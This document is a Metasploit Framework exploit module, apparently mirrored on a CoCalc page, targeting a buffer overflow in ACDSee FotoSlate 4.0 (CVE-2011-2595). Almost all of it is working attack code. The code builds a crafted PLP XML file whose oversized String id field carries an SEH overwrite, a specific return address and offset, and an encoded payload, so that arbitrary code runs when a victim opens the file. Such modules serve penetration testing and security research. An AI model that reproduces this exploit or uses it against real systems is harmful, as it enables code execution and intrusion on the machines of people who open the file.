CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/fileformat/acdsee_fotoslate_string.rb
Views: 11784
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = GoodRanking

8


9
  include Msf::Exploit::FILEFORMAT

10
  include Msf::Exploit::Remote::Seh

11


12
  def initialize(info = {})

13
    super(update_info(info,

14
      'Name'           => 'ACDSee FotoSlate PLP File id Parameter Overflow',

15
      'Description'    => %q{

16
          This module exploits a buffer overflow in ACDSee FotoSlate 4.0 Build 146 via

17
        a specially crafted id parameter in a String element.  When viewing a malicious

18
        PLP file with the ACDSee FotoSlate product, a remote attacker could overflow a

19
        buffer and execute arbitrary code. This exploit has been tested on systems such as

20
        Windows XP SP3, Windows Vista, and Windows 7.

21
      },

22
      'License'        => MSF_LICENSE,

23
      'Author'         =>

24
        [

25
          'Parvez Anwar', # Vulnerability discovery

26
          'juan vazquez'  # Metasploit module

27
        ],

28
      'References'     =>

29
        [

30
          [ 'CVE', '2011-2595' ],

31
          [ 'OSVDB', '75425' ],

32
          [ 'BID', '49558' ],

33
        ],

34
      'DefaultOptions' =>

35
        {

36
          'EXITFUNC' => 'process',

37
          'DisablePayloadHandler' => true

38
        },

39
      'Payload'        =>

40
        {

41
          #'Space'    => 4000,

42
          'BadChars' => "\x00\x22"

43
        },

44
      'Platform' => 'win',

45
      'Targets'        =>

46
        [

47
          [

48
            'ACDSee FotoSlate 4.0 Build 146',

49
            {

50
              'Ret'         => 0x263a5b57, # pop, pop, ret from ipwssl6.dll

51
              'Offset'      => 1812,

52
              'TotalLength' => 5000

53
            }

54
          ],

55
        ],

56
      'Privileged'     => false,

57
      'DisclosureDate' => '2011-09-12',

58
      'DefaultTarget'  => 0))

59


60
    register_options(

61
      [

62
        OptString.new('FILENAME', [ true, 'The file name.',  'msf.plp']),

63
      ])

64
  end

65


66
  def exploit

67


68
    overflow = rand_text(target["Offset"])

69
    overflow << generate_seh_record(target.ret)

70
    overflow << payload.encoded

71
    overflow << rand_text_alpha(target["TotalLength"] - overflow.length)

72


73
    plp =<<TEMPLATE

74
<?xml version="1.0" encoding="ISO-8859-1"?>

75
<ACDFotoSlateDocument15>

76
<PageDefinition>

77
<Template>

78
<Version>3.0</Version>

79
<Page>

80
<Name>Letter</Name>

81
<Properties>

82
<String id="#{overflow}"></String>

83
<String id="Width">8.500000IN</String>

84
<String id="Height">11.000000IN</String>

85
<String id="Orientation">Portrait</String>

86
<Bool id="AutoRotate">FALSE</Bool>

87
<Bool id="AutoFill">FALSE</Bool>

88
</Properties>

89
<Content>

90
<Bool id="UseBGColor">FALSE</Bool>

91
<Int id="BGImageType">0</Int>

92
<String id="BGImageFile"></String>

93
<Int id="BGColor">16777215</Int>

94
</Content>

95
</Page>

96
<ToolList>

97
<Group>

98
<Tool>

99
<Name>Image</Name>

100
<Properties>

101
<String id="XPos">0.500000IN</String>

102
<String id="YPos">0.500000IN</String>

103
<String id="Width">7.500000IN</String>

104
<String id="Height">10.000000IN</String>

105
<Float id="Tilt">0.000000</Float>

106
</Properties>

107
<Content>

108
<Int id="ShapeType">0</Int>

109
<Float id="RoundRectX">0.000000</Float>

110
<Float id="RoundRectY">0.000000</Float>

111
<Bool id="ShrinkToFit">FALSE</Bool>

112
<Bool id="AutoRotate">FALSE</Bool>

113
<Float id="BorderWidth">0.000000</Float>

114
<Bool id="UseBGColor">FALSE</Bool>

115
<Int id="BGColor">8454143</Int>

116
<Bool id="DropShadow">FALSE</Bool>

117
<Int id="DSColor">0</Int>

118
<Bool id="BevelEdge">FALSE</Bool>

119
<Bool id="Border">FALSE</Bool>

120
<Int id="BorderColor">16711680</Int>

121
<Bool id="IsLocked">FALSE</Bool>

122
</Content>

123
</Tool>

124
</Group>

125
</ToolList>

126
</Template>

127
<PageContent>

128
<Version>3.0</Version>

129
<Page>

130
<Name>Letter</Name>

131
<Content>

132
<Bool id="UseBGColor">FALSE</Bool>

133
<Int id="BGImageType">0</Int>

134
<String id="BGImageFile"></String>

135
<Int id="BGColor">16777215</Int>

136
</Content>

137
</Page>

138
<ToolList>

139
<Group>

140
<Tool>

141
<Name>Image</Name>

142
<Content>

143
<Int id="ShapeType">0</Int>

144
<Float id="RoundRectX">0.000000</Float>

145
<Float id="RoundRectY">0.000000</Float>

146
<Bool id="ShrinkToFit">FALSE</Bool>

147
<Bool id="AutoRotate">FALSE</Bool>

148
<Float id="BorderWidth">0.000000</Float>

149
<Bool id="UseBGColor">FALSE</Bool>

150
<Int id="BGColor">8454143</Int>

151
<Bool id="DropShadow">FALSE</Bool>

152
<Int id="DSColor">0</Int>

153
<Bool id="BevelEdge">FALSE</Bool>

154
<Bool id="Border">FALSE</Bool>

155
<Int id="BorderColor">16711680</Int>

156
<Bool id="IsLocked">FALSE</Bool>

157
</Content>

158
</Tool>

159
</Group>

160
</ToolList>

161
</PageContent>

162
</PageDefinition>

163
</ACDFotoSlateDocument15>

164
TEMPLATE

165


166
    print_status("Creating '#{datastore['FILENAME']}' file ...")

167
    file_create(plp)

168
  end

169
end

170


171


172
=begin

173
After SEH, we have ~0x23C3 bytes (9155 in decimal) of space for payload. But we need to avoid

174
using a long buffer in order to avoid the meterpreter possibly being broken.

175
=end

176


177